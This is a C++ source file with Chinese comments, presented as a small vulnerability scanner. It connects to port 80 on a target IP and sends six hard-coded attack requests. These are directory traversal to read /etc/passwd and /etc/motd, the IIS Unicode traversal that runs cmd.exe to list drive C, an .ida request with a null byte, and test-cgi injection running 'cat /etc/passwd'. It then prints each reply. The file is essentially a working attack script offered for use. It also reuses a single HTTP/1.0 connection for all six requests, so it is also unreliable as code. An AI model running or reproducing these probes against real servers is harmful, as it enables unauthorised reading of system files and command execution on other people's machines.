scanremoteserver.cpp

一个用c++编写小巧漏洞扫描器

#include <stdio.h>  
#include <string.h>  
#include <winsock.h>  

void main(int argc, char *argv[])  
{  
	// 检查运行参数
	if(argc!=2)
	{  
		printf("Useage: ScanRemoteServer [IP address]\n");  
		exit(-1);  
	}
	
	// 初始化Winsock
	WORD wVersionRequested = MAKEWORD( 1, 1 );
	WSADATA wsaData;
	if (WSAStartup(wVersionRequested, &wsaData))
	{  
		printf("Winsock Initialization failed.\n");  
		exit(-1);  
	}
	
	// 建立socket
	SOCKET sock;
	if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET)
	{  
		printf("Can not create socket.\n");  
		exit(-1);  
	}

	// 设置远程服务器的相关参数
	struct sockaddr_in blah; 
	blah.sin_family = AF_INET;					// 设置使用的协议族
	blah.sin_port = htons(80);					// 设置服务器端口
	blah.sin_addr.s_addr = inet_addr(argv[1]);  // 设置服务器IP
	if(blah.sin_addr.s_addr==-1)	// 服务器的IP不能是255.255.255.255
	{  
		WSACleanup();  
		exit(-1);  
	}  

	// socket连接远程服务器
	if(connect(sock, (struct sockaddr*)&blah, sizeof(blah))!=0)
	{
		WSACleanup();  
		exit(-1);  
	}

	// 定义发送的请求
	char *ex[6];  
	ex[0] = "GET /../../../../etc/passwd HTTP/1.0\n\n";  
	ex[1] = "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\n\n";  
	ex[2] = "GET /A.ida/%c1%00.ida HTTP/1.0\n\n";  
	ex[3] = "GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";  
	ex[4] = "GET /cgi-bin/test-cgi?\\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";  
	ex[5] = "GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";

	// 接收缓存
	char buff[1024];

	// 依次发送各个GET请求，以判断服务器是否存在相应的文件
	for(int i=0; i<6; i++)
	{ 
		printf(">> %s\n", ex[i]);
		send(sock, ex[i], strlen(ex[i]), 0);
		memset(buff, 0, 1024);
		recv(sock, buff, sizeof(buff), 0); 
		printf("<< %s\n\n", buff);
	}
	
	closesocket(sock);	// 关闭socket
	WSACleanup();
}